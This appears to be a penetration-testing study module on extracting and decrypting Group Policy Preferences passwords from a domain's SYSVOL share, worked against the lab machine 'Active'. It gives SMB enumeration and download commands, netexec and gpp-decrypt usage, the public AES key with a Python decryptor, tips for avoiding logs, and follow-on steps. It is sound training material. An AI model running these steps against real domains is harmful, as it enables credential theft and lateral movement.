Back to All Modules

GPP Password Extraction

#Overview

Group Policy Preferences (GPP), introduced in Server 2008, allowed administrators to configure users, groups, and scheduled tasks across the domain. GPP supported storing passwords (e.g., for local admin accounts) in SYSVOL under Groups.xml, Services.xml, and Printers.xml. Microsoft published the AES-256 encryption key on MSDN in 2012, making all GPP-encrypted passwords trivially decryptable. Any authenticated domain user with SYSVOL read access can exploit this.

#Prerequisites

  • SMB access to the SYSVOL or Replication share (anonymous or authenticated)
  • Network access to the Domain Controller on port 445

#Detection & Enumeration

#SMB Share Discovery

# Check for accessible shares (anonymous)
smbclient -L //10.10.10.100
# Look for: SYSVOL, Replication (replica of SYSVOL)

# Verify access with smbmap
smbmap -H 10.10.10.100
# READ ONLY on Replication or SYSVOL is sufficient

# Connect and recursively download
smbclient //10.10.10.100/Replication
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
# This downloads all files including Groups.xml

# With credentials
smbmap -d active.htb -u SVC_TGS -p 'GPPstillStandingStrong2k18' -H 10.10.10.100
BASH

#Key Files to Search

GPP passwords can appear in:

  • Groups.xml — local user accounts with cpassword attribute
  • Services.xml — service account passwords
  • Printers.xml — printer configuration passwords
  • Drives.xml — mapped drive credentials
  • DataSources.xml — data source connection strings

The standard path is:

\\<domain>\SYSVOL\<domain>\Policies\{<GUID>}\Machine\Preferences\Groups\Groups.xml
TEXT

#netexec GPP Module

# Automated GPP password search
netexec smb 10.10.10.100 -u user -p pass -M gpp_password
# Searches SYSVOL for cpassword attributes automatically

# Without credentials (if null session)
netexec smb 10.10.10.100 --shares
BASH

#Exploitation / Execution

#gpp-decrypt Tool

# Extract the cpassword value from Groups.xml
# cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

# Decrypt using gpp-decrypt
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
# Output: GPPstillStandingStrong2k18
BASH

#Sample Groups.xml Structure

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
        name="active.htb\SVC_TGS" image="2"
        changed="2018-07-18 20:46:06"
        uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
      userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
XML

#Manual Decryption (Python)

# The GPP AES key is publicly known:
# 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
# f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b

from Crypto.Cipher import AES
import base64

key = b'\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b'
cpassword = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

encrypted = base64.b64decode(cpassword)
cipher = AES.new(key, AES.MODE_CBC, iv=b'\x00'*16)
decrypted = cipher.decrypt(encrypted)
print(decrypted.decode('utf-16-le').rstrip('\x00'))
PYTHON

#Common Pitfalls

  • SYSVOL not accessible anonymously: Many modern domains restrict SYSVOL to authenticated users only. Obtain any domain credential first.
  • No cpassword attributes found: The organization may not use GPP for password deployment. Move to other techniques.
  • gpp-decrypt not installed: Use the Python manual method or compile from source.

#OPSEC Considerations

  • Reading SYSVOL files generates standard SMB file access logs
  • GPP password extraction is entirely passive from the DC's perspective — no Kerberos or authentication events beyond the initial SMB connection
  • This is considered low-hanging fruit and is often flagged by Microsoft's own security baseline assessments

#Post-Exploitation Value

  • The decrypted account may be a service account with elevated AD privileges
  • The account may have WinRM access for remote shell
  • Password reuse may allow access to additional accounts
  • The foothold account enables authenticated BloodHound ingestion and Kerberoasting

#Cross-References

#Tool References

ToolLink
gpp-decryptBuilt into Kali; also available at https://github.com/t0thkr1s/gpp-decrypt
netexechttps://github.com/Pennyw0rth/NetExec
smbmaphttps://github.com/ShawnDEvans/SMBMap

#Source Machines

  • Active (Easy) — Anonymous access to Replication share -> Groups.xml -> cpassword -> SVC_TGS:GPPstillStandingStrong2k18 -> Kerberoasting -> Administrator